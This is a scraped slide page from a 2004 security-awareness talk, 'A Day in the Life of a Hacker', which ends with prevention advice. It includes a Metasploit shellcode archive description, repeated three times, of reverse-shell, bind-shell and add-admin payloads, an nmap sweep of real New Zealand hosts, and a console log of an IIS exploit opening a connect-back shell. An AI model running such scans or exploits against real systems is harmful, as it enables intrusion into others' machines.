Security-Assessment.com Copyright Security-Assessment.com 2004 A Day in the Life of a Hacker by Brett Moore.

Slides:



Advertisements
Similar presentations
Enabling Secure Internet Access with ISA Server
Advertisements

Snort & ACID. UTSA IS 6973 Computer Forensics SNORT.
By Hiranmayi Pai Neeraj Jain
Andrew Roths Fermin J. Serna MSRC Engineering and MSEC Science Microsoft Corporation.
Lecturer: Fadwa Tlaelan
Hackers, Crackers, and Network Intruders: Heroes, villains, or delinquents? Tim McLaren Thursday, September 28, 2000 McMaster University.
Unit 18 Data Security 1.
Web Defacement Anh Nguyen May 6 th, Organization Introduction How Hackers Deface Web Pages Solutions to Web Defacement Conclusions 2.
ITP 457 Network Security Network Hacking 101. Hacking Methodology (review) 1. Gather target information 2. Identify services and ports open on the target.
Computer Viruses.
Chalmers University of Technology Language-based Security Internet Explorer Exploit Christian O. Andersson Jonas Stiborg Andén.
1 Configuring Web services (Week 15, Monday 4/17/2006) © Abdou Illia, Spring 2006.
EECS Presentation Web Tap: Intelligent Intrusion Detection Kevin Borders.
January 14, 2010 Introduction to Ethical Hacking and Network Defense MIS © Abdou Illia.
Privacy - not readable Permanent - not alterable (can't edit, delete) Reliable - (changes detectable) But the data must be accessible to persons authorized.
Computer Security and Penetration Testing
LittleOrange Internet Security an Endpoint Security Appliance.
Computer Networks IGCSE ICT Section 4.
Guide to Operating System Security Chapter 2 Viruses, Worms, and Malicious Software.
Internet Relay Chat Chandrea Dungy Derek Garrett #29.
RFC6520 defines SSL Heartbeats - What are they? 1. SSL Heartbeats are used to keep a connection alive without the need to constantly renegotiate the SSL.
© 2008 Cisco Systems, Inc. All rights reserved.Cisco ConfidentialPresentation_ID 1 IT Essentials PC Hardware and Software 4.1 Instructional Resource Chapter.
CS426Fall 2010/Lecture 361 Computer Security CS 426 Lecture 36 Perimeter Defense and Firewalls.
© 2007 Cisco Systems, Inc. All rights reserved.Cisco Public 1 Version 4.1 ISP Responsibility Working at a Small-to-Medium Business or ISP – Chapter 8.
Web Servers Web server software is a product that works with the operating system The server computer can run more than one software product such as .
1 Infrastructure Hardening. 2 Objectives Why hardening infrastructure is important? Hardening Operating Systems, Network and Applications.
© 2007 Cisco Systems, Inc. All rights reserved.Cisco Public ITE PC v4.0 Chapter 1 1 Basic Security Networking for Home and Small Businesses – Chapter 8.
Detrick Robinson & Amris Treadwell.  Computer viruses- are pieces of programs that are purposely made up to infect your computer.  Examples: › Internet.
Human-Computer Interface Course 5. ISPs and Internet connection.
Demystifying Backdoor Shells and IRC Bots: The Risk … By : Jonathan.
Buffer Overflows Lesson 14. Example of poor programming/errors Buffer Overflows result of poor programming practice use of functions such as gets and.
BY OLIVIA WILSON AND BRITTANY MCDONALD Up Your Shields with Shields Up!
CIS 450 – Network Security Chapter 3 – Information Gathering.
1 CHAPTER 3 CLASSES OF ATTACK. 2 Denial of Service (DoS) Takes place when availability to resource is intentionally blocked or degraded Takes place when.
1 CHAPTER 2 LAWS OF SECURITY. 2 What Are the Laws of Security Client side security doesn’t work Client side security doesn’t work You can’t exchange encryption.
CS 4010 Hacking Samba Server Vulnerabilities. Recon Telnet headers claim the following: –Red Hat Linux release 9 (Shrike) –Kernel smp on an i686.
© 1999 Ernst & Young LLP e e treme hacking Black Hat 1999 Over the Router, Through the Firewall, to Grandma’s House We Go George Kurtz & Eric Schultze.
1 Topic 2: Lesson 3 Intro to Firewalls Summary. 2 Basic questions What is a firewall? What is a firewall? What can a firewall do? What can a firewall.
Network Assessment How intrusion techniques contribute to system/network security Network and system monitoring System mapping Ports, OS, applications.
7400 Samsung Confidential & Proprietary Information Copyright 2006, All Rights Reserved. -0/17- OfficeServ 7400 Enterprise IP Solutions Quick Install Guide.
1 Implementing Monitoring and Reporting. 2 Why Should Implement Monitoring? One of the biggest complaints we hear about firewall products from almost.
1 Figure 4-1: Targeted System Penetration (Break-In Attacks) Host Scanning  Ping often is blocked by firewalls  Send TCP SYN/ACK to generate RST segments.
Hacking Windows 9X/ME. Hacking framework Initial access physical access brute force trojans Privilege escalation Administrator, root privileges Consolidation.
CNIT 124: Advanced Ethical Hacking Ch 10: Client-Side Exploitation.
NetTech Solutions Protecting the Computer Lesson 10.
Web Security. Introduction Webserver hacking refers to attackers taking advantage of vulnerabilities inherent to the web server software itself These.
Firewalls A brief introduction to firewalls. What does a Firewall do? Firewalls are essential tools in managing and controlling network traffic Firewalls.
Role Of Network IDS in Network Perimeter Defense.
Databases Kevin Wright Ben Bruckner Group 40. Outline Background Vulnerabilities Log File Cleaning This Lab.
Session 11: Cookies, Sessions ans Security iNET Academy Open Source Web Development.
Page 1 Viruses. Page 2 What Is a Virus A virus is basically a computer program that has been written to perform a specific set of tasks. Unfortunately,
Information Systems Design and Development Security Precautions Computing Science.
General Information: This document was created for use in the "Bridges to Computing" project of Brooklyn College. You are invited and encouraged to use.
Web Server Administration Chapter 6 Configuring a Web Server.
Chapter 14.  Upon completion of this chapter, you should be able to:  Identify different types of Intrusion Detection Systems and Prevention Systems.
CIS 4930 / CIS 5930 Offensive Computer Security Spring 2014 I only edited it again.
Lecture 19 Page 1 CS 236 Online 6. Application Software Security Why it’s important: –Security flaws in applications are increasingly the attacker’s entry.
Common System Exploits Tom Chothia Computer Security, Lecture 17.
Microsoft OS Vulnerabilities April 1, 2010 MIS 4600 – MBA © Abdou Illia.
Unit 3 Section 6.4: Internet Security
Seminar On Ethical Hacking Submitted To: Submitted By:
Working at a Small-to-Medium Business or ISP – Chapter 8
The Linux Operating System
Web Caching? Web Caching:.
Topic 5: Communication and the Internet
Information Security Session October 24, 2005
UNIT 18 Data Security 1.
CS580 Special Project: IOS Firewall Setup using CISCO 1600 router
Network hardening Chapter 14.
6. Application Software Security
Presentation transcript:

Security-Assessment.com Copyright Security-Assessment.com 2004 A Day in the Life of a Hacker by Brett Moore

Security-Assessment.com Copyright Security-Assessment.com 2004 Hacker, Cracker, Black Hat, Script Kiddie, Warez Pirate, Disgruntled employee, Ex employee, Dishonest employee, Temporary employee, After hours cleaner, Etc etc.. “A hacker by any name, still hacks” opportunist VS motivated

Security-Assessment.com Copyright Security-Assessment.com 2004

The Metasploit Project Last Update: 02/21/2004 Sections - Metasploit - Shellcode - Opcode DB - Projects - Releases - Research - Contact - Links The Shellcode Archive contains various payloads written by the Metasploit staff. All payloads come with source code and usage instructions. Many of the techniques (and some code) have been borrowed from other sources, credit is given where applicable. Almost none of the code here has been optimized for size, usually there is no need for it, and when there is, it makes more sense to rewrite it from scratch. Effort has been placed into writing payloads that not only work reliably under most environments, but also clean up after themselves when the target goal is achieved. Win32 Vampiric Import Example Many win32 operating systems include a large amount of libraries and executables which are static across service packs. These files can be used to write really small service-pack independent payloads. The example below attaches to dbmssocn.dll and uses the import address table to download and execute a secondary payload. Assembled Size: 179 bytes - Windows 2000 Vampiric Import ASM - Windows 2000 Vampiric Import C - Windows 2000 Vampiric Import Perl - Windows 2000 Vampiric Import Exe MD5 (30053a85bf2f57a8c8ac93f30ae10596) Win32 OS/SP Independent Loader This code uses the kernel32.dll locating technique described by LSD in their "Win32 Assembly Components" paper. Our implementation is based off code by Dino Dai Zovi, with minor changes to remove the need for any calls to GetProcAddress (all functions are found solely by their hash) and to provide a C function to obtain the hash value for a given string. The majority of the win32 payloads on this site use this loader. - Win32 OS/SP Independent Loader C [Visual Studio] Win32 Bind Shell This payload will load winsock, listen on a port, and spawn a cmd.exe shell when a connection is made. It will call WaitForSingleObject with an infinite timeout and then ExitProcess when the cmd.exe process has terminated. This payload has been tested on many service packs of Windows NT 4.0, Windows 2000, and Windows XP. This payload will NOT work on Windows 9x since cmd.exe does not exist and command.com can't send its output back to the socket. Assembled Size: 356 bytes - Win32 Bind Shell ASM - Win32 Bind Shell C - Win32 Bind Shell Perl - Win32 Bind Shell Exe MD5 (7995b0f4b8ab2f0ee2166ee51ae2048f) Win32 Reverse Shell This payload will load winsock, connect to the specified host, and spawn a cmd.exe shell. It will call WaitForSingleObject with an infinite timeout and then ExitProcess when the cmd.exe process has terminated. This payload has been tested on many service packs of Windows NT 4.0, Windows 2000, and Windows XP. This payload will NOT work on Windows 9x since cmd.exe does not exist and command.com can't send its output back to the socket. A newer, much smaller version of this payload will be released soon. Assembled Size: 335 bytes - Win32 Reverse Shell ASM - Win32 Reverse Shell C - Win32 Reverse Shell Exe MD5 (323b372de2ee3998a9d0ee4e ) Win32 Create Local Admin User This payload will load netapi32.dll and call NetUserAdd followed by NetLocalGroupAddMembers. It will create a new user account with the username and password of "X" and add it to the local group "Administrators". This payload has been tested against Windows 2000 and Windows XP, it will not work on Windows 9x systems. Assembled Size: 304 bytes - Win32 Add User ASM - Win32 Add User C - Win32 Add User Exe MD5 (bbc784fe965163b21cfac8f5a38eabcb) Win32 Exception Handle Example This payload demonstrates the use of the Windows exception handling system. Essentially it overwrites the SEH chain at fs:[0] and then triggers an exception through a null pointer dereference, jumping to the code we specify. This technique becomes very useful when writing exploits for bugs which only allow for a small number of bytes to be overwritten. - Win32 Exception Handler ASM x86 FNSTENV XOR Byte Decoder This encoder uses the fnstenv instruction to save the floating point environment to the stack, where it pulls the original eip value and then decodes the real payload. This technique was first described by noir on the vuln-dev mailing list. The actual encoder can only handle 256 bytes in its current form, if more than 256 bytes are needed, change the sub cl to sub cx. The nice thing about this decoder is that it is small (23 bytes) and does not use the jmp/call track to get the eip value, this may prevent certain signature matching intrusion detection systems from detecting the payload. - FNSTENV Xor Decoder ASMMetasploitShellcodeOpcode DBProjectsReleasesResearchContactLinksWindows 2000 Vampiric Import ASMWindows 2000 Vampiric Import CWindows 2000 Vampiric Import PerlWindows 2000 Vampiric Import ExeLSDWin32 OS/SP Independent Loader C [Visual Studio]Win32 Bind Shell ASMWin32 Bind Shell CWin32 Bind Shell PerlWin32 Bind Shell ExeWin32 Reverse Shell ASMWin32 Reverse Shell CWin32 Reverse Shell ExeWin32 Add User ASMWin32 Add User CWin32 Add User ExeWin32 Exception Handler ASMFNSTENV Xor Decoder ASM © 2004 METASPLOIT.COM "I saw this discovery channel show the other day, about this lady who trained rats to run cat5 cable, apparently it works pretty good. So i could have this robot, that unleashes an army of augmented rats..." DL

The Metasploit Project Last Update: 02/21/2004 Sections - Metasploit - Shellcode - Opcode DB - Projects - Releases - Research - Contact - Links The Shellcode Archive contains various payloads written by the Metasploit staff. All payloads come with source code and usage instructions. Many of the techniques (and some code) have been borrowed from other sources, credit is given where applicable. Almost none of the code here has been optimized for size, usually there is no need for it, and when there is, it makes more sense to rewrite it from scratch. Effort has been placed into writing payloads that not only work reliably under most environments, but also clean up after themselves when the target goal is achieved. Win32 Vampiric Import Example Many win32 operating systems include a large amount of libraries and executables which are static across service packs. These files can be used to write really small service-pack independent payloads. The example below attaches to dbmssocn.dll and uses the import address table to download and execute a secondary payload. Assembled Size: 179 bytes - Windows 2000 Vampiric Import ASM - Windows 2000 Vampiric Import C - Windows 2000 Vampiric Import Perl - Windows 2000 Vampiric Import Exe MD5 (30053a85bf2f57a8c8ac93f30ae10596) Win32 OS/SP Independent Loader This code uses the kernel32.dll locating technique described by LSD in their "Win32 Assembly Components" paper. Our implementation is based off code by Dino Dai Zovi, with minor changes to remove the need for any calls to GetProcAddress (all functions are found solely by their hash) and to provide a C function to obtain the hash value for a given string. The majority of the win32 payloads on this site use this loader. - Win32 OS/SP Independent Loader C [Visual Studio] Win32 Bind Shell This payload will load winsock, listen on a port, and spawn a cmd.exe shell when a connection is made. It will call WaitForSingleObject with an infinite timeout and then ExitProcess when the cmd.exe process has terminated. This payload has been tested on many service packs of Windows NT 4.0, Windows 2000, and Windows XP. This payload will NOT work on Windows 9x since cmd.exe does not exist and command.com can't send its output back to the socket. Assembled Size: 356 bytes - Win32 Bind Shell ASM - Win32 Bind Shell C - Win32 Bind Shell Perl - Win32 Bind Shell Exe MD5 (7995b0f4b8ab2f0ee2166ee51ae2048f) Win32 Reverse Shell This payload will load winsock, connect to the specified host, and spawn a cmd.exe shell. It will call WaitForSingleObject with an infinite timeout and then ExitProcess when the cmd.exe process has terminated. This payload has been tested on many service packs of Windows NT 4.0, Windows 2000, and Windows XP. This payload will NOT work on Windows 9x since cmd.exe does not exist and command.com can't send its output back to the socket. A newer, much smaller version of this payload will be released soon. Assembled Size: 335 bytes - Win32 Reverse Shell ASM - Win32 Reverse Shell C - Win32 Reverse Shell Exe MD5 (323b372de2ee3998a9d0ee4e ) Win32 Create Local Admin User This payload will load netapi32.dll and call NetUserAdd followed by NetLocalGroupAddMembers. It will create a new user account with the username and password of "X" and add it to the local group "Administrators". This payload has been tested against Windows 2000 and Windows XP, it will not work on Windows 9x systems. Assembled Size: 304 bytes - Win32 Add User ASM - Win32 Add User C - Win32 Add User Exe MD5 (bbc784fe965163b21cfac8f5a38eabcb) Win32 Exception Handle Example This payload demonstrates the use of the Windows exception handling system. Essentially it overwrites the SEH chain at fs:[0] and then triggers an exception through a null pointer dereference, jumping to the code we specify. This technique becomes very useful when writing exploits for bugs which only allow for a small number of bytes to be overwritten. - Win32 Exception Handler ASM x86 FNSTENV XOR Byte Decoder This encoder uses the fnstenv instruction to save the floating point environment to the stack, where it pulls the original eip value and then decodes the real payload. This technique was first described by noir on the vuln-dev mailing list. The actual encoder can only handle 256 bytes in its current form, if more than 256 bytes are needed, change the sub cl to sub cx. The nice thing about this decoder is that it is small (23 bytes) and does not use the jmp/call track to get the eip value, this may prevent certain signature matching intrusion detection systems from detecting the payload. - FNSTENV Xor Decoder ASMMetasploitShellcodeOpcode DBProjectsReleasesResearchContactLinksWindows 2000 Vampiric Import ASMWindows 2000 Vampiric Import CWindows 2000 Vampiric Import PerlWindows 2000 Vampiric Import ExeLSDWin32 OS/SP Independent Loader C [Visual Studio]Win32 Bind Shell ASMWin32 Bind Shell CWin32 Bind Shell PerlWin32 Bind Shell ExeWin32 Reverse Shell ASMWin32 Reverse Shell CWin32 Reverse Shell ExeWin32 Add User ASMWin32 Add User CWin32 Add User ExeWin32 Exception Handler ASMFNSTENV Xor Decoder ASM © 2004 METASPLOIT.COM "I saw this discovery channel show the other day, about this lady who trained rats to run cat5 cable, apparently it works pretty good. So i could have this robot, that unleashes an army of augmented rats..." DL

The Metasploit Project Last Update: 02/21/2004 Sections - Metasploit - Shellcode - Opcode DB - Projects - Releases - Research - Contact - Links The Shellcode Archive contains various payloads written by the Metasploit staff. All payloads come with source code and usage instructions. Many of the techniques (and some code) have been borrowed from other sources, credit is given where applicable. Almost none of the code here has been optimized for size, usually there is no need for it, and when there is, it makes more sense to rewrite it from scratch. Effort has been placed into writing payloads that not only work reliably under most environments, but also clean up after themselves when the target goal is achieved. Win32 Vampiric Import Example Many win32 operating systems include a large amount of libraries and executables which are static across service packs. These files can be used to write really small service-pack independent payloads. The example below attaches to dbmssocn.dll and uses the import address table to download and execute a secondary payload. Assembled Size: 179 bytes - Windows 2000 Vampiric Import ASM - Windows 2000 Vampiric Import C - Windows 2000 Vampiric Import Perl - Windows 2000 Vampiric Import Exe MD5 (30053a85bf2f57a8c8ac93f30ae10596) Win32 OS/SP Independent Loader This code uses the kernel32.dll locating technique described by LSD in their "Win32 Assembly Components" paper. Our implementation is based off code by Dino Dai Zovi, with minor changes to remove the need for any calls to GetProcAddress (all functions are found solely by their hash) and to provide a C function to obtain the hash value for a given string. The majority of the win32 payloads on this site use this loader. - Win32 OS/SP Independent Loader C [Visual Studio] Win32 Bind Shell This payload will load winsock, listen on a port, and spawn a cmd.exe shell when a connection is made. It will call WaitForSingleObject with an infinite timeout and then ExitProcess when the cmd.exe process has terminated. This payload has been tested on many service packs of Windows NT 4.0, Windows 2000, and Windows XP. This payload will NOT work on Windows 9x since cmd.exe does not exist and command.com can't send its output back to the socket. Assembled Size: 356 bytes - Win32 Bind Shell ASM - Win32 Bind Shell C - Win32 Bind Shell Perl - Win32 Bind Shell Exe MD5 (7995b0f4b8ab2f0ee2166ee51ae2048f) Win32 Reverse Shell This payload will load winsock, connect to the specified host, and spawn a cmd.exe shell. It will call WaitForSingleObject with an infinite timeout and then ExitProcess when the cmd.exe process has terminated. This payload has been tested on many service packs of Windows NT 4.0, Windows 2000, and Windows XP. This payload will NOT work on Windows 9x since cmd.exe does not exist and command.com can't send its output back to the socket. A newer, much smaller version of this payload will be released soon. Assembled Size: 335 bytes - Win32 Reverse Shell ASM - Win32 Reverse Shell C - Win32 Reverse Shell Exe MD5 (323b372de2ee3998a9d0ee4e ) Win32 Create Local Admin User This payload will load netapi32.dll and call NetUserAdd followed by NetLocalGroupAddMembers. It will create a new user account with the username and password of "X" and add it to the local group "Administrators". This payload has been tested against Windows 2000 and Windows XP, it will not work on Windows 9x systems. Assembled Size: 304 bytes - Win32 Add User ASM - Win32 Add User C - Win32 Add User Exe MD5 (bbc784fe965163b21cfac8f5a38eabcb) Win32 Exception Handle Example This payload demonstrates the use of the Windows exception handling system. Essentially it overwrites the SEH chain at fs:[0] and then triggers an exception through a null pointer dereference, jumping to the code we specify. This technique becomes very useful when writing exploits for bugs which only allow for a small number of bytes to be overwritten. - Win32 Exception Handler ASM x86 FNSTENV XOR Byte Decoder This encoder uses the fnstenv instruction to save the floating point environment to the stack, where it pulls the original eip value and then decodes the real payload. This technique was first described by noir on the vuln-dev mailing list. The actual encoder can only handle 256 bytes in its current form, if more than 256 bytes are needed, change the sub cl to sub cx. The nice thing about this decoder is that it is small (23 bytes) and does not use the jmp/call track to get the eip value, this may prevent certain signature matching intrusion detection systems from detecting the payload. - FNSTENV Xor Decoder ASMMetasploitShellcodeOpcode DBProjectsReleasesResearchContactLinksWindows 2000 Vampiric Import ASMWindows 2000 Vampiric Import CWindows 2000 Vampiric Import PerlWindows 2000 Vampiric Import ExeLSDWin32 OS/SP Independent Loader C [Visual Studio]Win32 Bind Shell ASMWin32 Bind Shell CWin32 Bind Shell PerlWin32 Bind Shell ExeWin32 Reverse Shell ASMWin32 Reverse Shell CWin32 Reverse Shell ExeWin32 Add User ASMWin32 Add User CWin32 Add User ExeWin32 Exception Handler ASMFNSTENV Xor Decoder ASM © 2004 METASPLOIT.COM "I saw this discovery channel show the other day, about this lady who trained rats to run cat5 cable, apparently it works pretty good. So i could have this robot, that unleashes an army of augmented rats..." DL

Security-Assessment.com Copyright Security-Assessment.com 2004 Hacker Of Opportunity  Low hanging fruit  Exploitable by known vulnerabilities  After peer recognition  Web page defacement

-bash-2.05b$ nmap -sP * Starting nmap 3.50 ( ) at :54 NZST Host e1-0.core5.akl.iconz.net.nz ( ) appears to be up. Host nemo.blackpepper.co.nz ( ) appears to be up. Host stream.blackpepper.co.nz ( ) appears to be up. Host blackpepper.co.nz ( ) appears to be up. Host ns1.visp.co.nz ( ) appears to be up. Host vorash.visp.co.nz ( ) appears to be up. Host ns2.visp.co.nz ( ) appears to be up. Host tollan.visp.co.nz ( ) appears to be up. Host webmail.visp.co.nz ( ) appears to be up. Host sql.visp.co.nz ( ) appears to be up. Host mail.visp.co.nz ( ) appears to be up. Host kagan.visp.co.nz ( ) appears to be up. Host visp.co.nz ( ) appears to be up. Host signup.visp.co.nz ( ) appears to be up. Host help.visp.co.nz ( ) appears to be up. Host csr.visp.co.nz ( ) appears to be up. Host appears to be up. Host reg.visp.co.nz ( ) appears to be up. Host jackal.visp.co.nz ( ) appears to be up. Host datavisiondirect.co.nz ( ) appears to be up. Host roverland.co.nz ( ) appears to be up. Host flyingstart.co.nz ( ) appears to be up. Host appears to be up. Host appears to be up. Host appears to be up. Host kiwielectronics.co.nz ( ) appears to be up. Host appears to be up. Host appears to be up. Host appears to be up. Host appears to be up. Host appears to be up. Host appears to be up. Host appears to be up. Host appears to be up. Host appears to be up. Host appears to be up. Host appears to be up. Host appears to be up. Host savage.visp.co.nz ( ) appears to be up. Host squid.visp.co.nz ( ) appears to be up. Host johnatwork.visp.co.nz ( ) appears to be up. Host appears to be up. Host arwen.visp.co.nz ( ) appears to be up. Host appears to be up. Host appears to be up. Host appears to be up. Host appears to be up. Host appears to be up. Host appears to be up. Host appears to be up. Host appears to be up. Host appears to be up. Host appears to be up. Host visp.co.nz ( ) appears to be up. Host appears to be up. Host appears to be up. Host appears to be up. Host appears to be up. Host webhost.visp.co.nz ( ) appears to be up. Host appears to be up. Host appears to be up. Host appears to be up. Host appears to be up. Host appears to be up. Host appears to be up. Host rfgate.visp.co.nz ( ) appears to be up. Host appears to be up. Host appears to be up. Host dallimore.co.nz ( ) appears to be up. Host appears to be up. Host appears to be up. Host appears to be up. Host appears to be up. Host appears to be up. Host appears to be up. Host appears to be up. Host appears to be up. Host appears to be up. Host appears to be up. Host appears to be up. Host appears to be up. Host banking.visp.co.nz ( ) appears to be up. Host reg.coolnet.co.nz ( ) appears to be up. Host appears to be up. Host ( ) appears to be up. Host ( ) appears to be up. Host worksol.worksolutions.com.au ( ) appears to be up. Host appears to be up. Host appears to be up. Host appears to be up. Host mail.chameleon.net.nz ( ) appears to be up. Host ( ) appears to be up. Host appears to be up. Host appears to be up. Host appears to be up. Host stimpy.blackpepper.co.nz ( ) appears to be up. Host visp.co.nz ( ) appears to be up. Host appears to be up. Host appears to be up. Host appears to be up. Host appears to be up. Host appears to be up. Nmap run completed IP addresses (102 hosts up) scanned in seconds -bash-2.05b$ % Advanced port ping only % Using raw request timeout: 7 secs % Scanning * (254 ips) % 4 servers found, 10 seconds [OPEN] [closed] [closed] [OPEN] % 2 open, 2 closed, 0 filtered % 4 responses shown, 10 seconds % Using raw request timeout: 7 secs % Scanning * (254 ips) % 69 servers found, 10 seconds Server: Apache/ (Unix) mod_ssl/ OpenSSL/0.9.7b PHP/ Server: Apache/ (Unix) PHP/4.0.4 mod_ssl/2.8.0 OpenSSL/ Server: Microsoft-IIS/ Server: Microsoft-IIS/ Server: Microsoft-IIS/ Server: Microsoft-IIS/ Server: Microsoft-IIS/ Server: Apache/ (Unix) mod_ssl/ OpenSSL/0.9.7b PHP/ Server: Microsoft-IIS/ Server: Microsoft-IIS/ Server: Microsoft-IIS/ Server: Apache/ (Unix) mod_ssl/ OpenSSL/0.9.7b PHP/ Server: Apache/ (Unix) PHP/ Server: Microsoft-IIS/ Server: Microsoft-IIS/ Server: Microsoft-IIS/ Server: Microsoft-IIS/ Server: Microsoft-IIS/ Server: Microsoft-IIS/ Server: Microsoft-IIS/ Server: Microsoft-IIS/ Server: Microsoft-IIS/ Server: Microsoft-IIS/ Server: Microsoft-IIS/ Server: Microsoft-IIS/ Server: Microsoft-IIS/ Server: Microsoft-IIS/ Server: Microsoft-IIS/ Server: Microsoft-IIS/ Server: Microsoft-IIS/ Server: Microsoft-IIS/ Server: Microsoft-IIS/ Server: Microsoft-IIS/ Server: Microsoft-IIS/ Server: Microsoft-IIS/ Server: Microsoft-IIS/ Server: Microsoft-IIS/ Server: Microsoft-IIS/ Server: Microsoft-IIS/ Server: Microsoft-IIS/ Server: Microsoft-IIS/ Server: Microsoft-IIS/ Server: Microsoft-IIS/ Server: Microsoft-IIS/ Server: Microsoft-IIS/ Server: Microsoft-IIS/ Server: Microsoft-IIS/ Server: Microsoft-IIS/ Server: Microsoft-IIS/ Server: Microsoft-IIS/ Server: Microsoft-IIS/ Server: Microsoft-IIS/ Server: Microsoft-IIS/ Server: Apache/ (Unix) mod_ssl/ OpenSSL/0.9.7b DAV/2 mod_jk2/2.0.3-dev PHP/ Server: UserLand Frontier/8.0.5-MacOSX Server: Apache/ (Unix) PHP/ Server: Apache/ (Unix) PHP/ Server: Microsoft-IIS/ Server: Apache/ (Unix) mod_ssl/ OpenSSL/0.9.7b DAV/2 mod_jk2/2.0.3-dev PHP/ Server: Microsoft-IIS/ Server: Microsoft-IIS/ Server: Microsoft-IIS/ Server: Microsoft-IIS/ Server: Microsoft-IIS/ Server: Microsoft-IIS/ Server: Microsoft-IIS/ Server: Microsoft-IIS/ Server: Microsoft-IIS/ Server: Microsoft-IIS/4.0 % 69 responses shown, 30 seconds SYSTEMX:>tmp/tools/> Scanner –p –

Security-Assessment.com Copyright Security-Assessment.com 2004 Hacker Of Opportunity  Constantly scanning the Internet  Vast log files of computers  Distance is no protection  New Zealand is no safer than elsewhere

Security-Assessment.com Copyright Security-Assessment.com 2004 DEMO 1 : Exploiting a known vulnerability

E:\exploits>checkmedia HTTP/ OK Server: Microsoft-IIS/5.0 Date: Sat, 27 Mar :13:30 GMT Content-Type: text/html NetShow ISAPI Log Dll NetShow ISAPI Log Dll E:\exploits>nsiislog ** IISNSLOG.DLL - Windows Media Services - Remote Shell ** ** Tested Against Service Pack 4 ** Usage: nsiislog ip [ourip] [ourport] E:\exploits>nsiislog ** IISNSLOG.DLL - Windows Media Services - Remote Shell ** ** Tested Against Service Pack 4 **. Calling Home: blackhole:2000. Preparing Exploit Buffer...…Ready. Starting Listener On Port: Connecting To Sending Exploit......Exploit Sent. Connection Received Microsoft Windows 2000 [Version ] (C) Copyright Microsoft Corp. C:\WINNT\system32>\whoami IWAM_BLACKHOLE C:\WINNT\system32>

Security-Assessment.com Copyright Security-Assessment.com 2004 Prevention  Be aware of the problems and stay current with patches  Subscribe to vendor security mailing lists  Be alert to large increases in bandwidth  The large amount of bogus traffic on the Internet, makes logs less useful

Security-Assessment.com Copyright Security-Assessment.com 2004 Hacker Of Motive  Revenge  Private information  Take their time  Information discovery  Whois, nslookup, mail headers

Security-Assessment.com Copyright Security-Assessment.com 2004

Security-Assessment.com Copyright Security-Assessment.com 2004 >nslookup acme.co.nz Server: UnKnown Address: Non-authoritative answer: Name: acme.co.nz Address: >nslookup Server: UnKnown Address: Non-authoritative answer: Name: Address: >nslookup mail.acme.co.nz Server: UnKnown Address: Non-authoritative answer: Name: mail.acme.co.nz Address: >nslookup Default Server: UnKnown Address: > set type=any > acme.co.nz Server: UnKnown Address: Non-authoritative answer: acme.co.nz MX preference = 5, mail exchanger = mail.acme.co.nz acme.co.nz internet address = acme.co.nz primary name server = ns.blackhole responsible mail addr = mail.blackhole.co.nz serial = refresh = (1 day) retry = 7200 (2 hours) expire = (41 days 16 hours) default TTL = (8 hours) acme.co.nz nameserver = ns.blackhole acme.co.nz nameserver = ns.blackhole mail.acme.co.nz internet address =

Security-Assessment.com Copyright Security-Assessment.com 2004

Security-Assessment.com Copyright Security-Assessment.com 2004 Hacker Of Motive  Easy access through an trojan  The  The

Security-Assessment.com Copyright Security-Assessment.com 2004 Hacker Of Motive  Will replicate the target environment  Discover new vulnerabilities  Create new exploits  New exploits pass through IDS rules

Security-Assessment.com Copyright Security-Assessment.com 2004 DEMO 2 : Exploiting an unknown vulnerability

Security-Assessment.com Copyright Security-Assessment.com 2004

Security-Assessment.com Copyright Security-Assessment.com 2004

Security-Assessment.com Copyright Security-Assessment.com 2004 Firewalls No Firewall, Attackers connection allowed Firewall blocks connection. Attacker uses connect back shell Firewall blocks connect and connect back. Attacker uses socket reuse shell

Security-Assessment.com Copyright Security-Assessment.com 2004 Prevention  Virus scanners  Intrusion Detection Systems  Firewalls  Ensure strong passwords and adequate firewall rules are enforced.

Security-Assessment.com Copyright Security-Assessment.com 2004 Prevention  Internal IDS  Educated staff  Forensic response ability, Tripwire  Intelligent Log analysis

Security-Assessment.com Copyright Security-Assessment.com 2004 Presentation Slides Available For Download From:

Security-Assessment.com Copyright Security-Assessment.com 2004 NEWS LINKS Police called after National Party website hacked Local hacker faces big bill Kiwis 'have weakness for internet scams‘ Australian hacker activity on the rise NZ Police lay first charge for hacking UK teen escapes jail in nuclear lab hack case Hackers exploit Windows patches A peek at script kiddie culture Hacking insurance is a must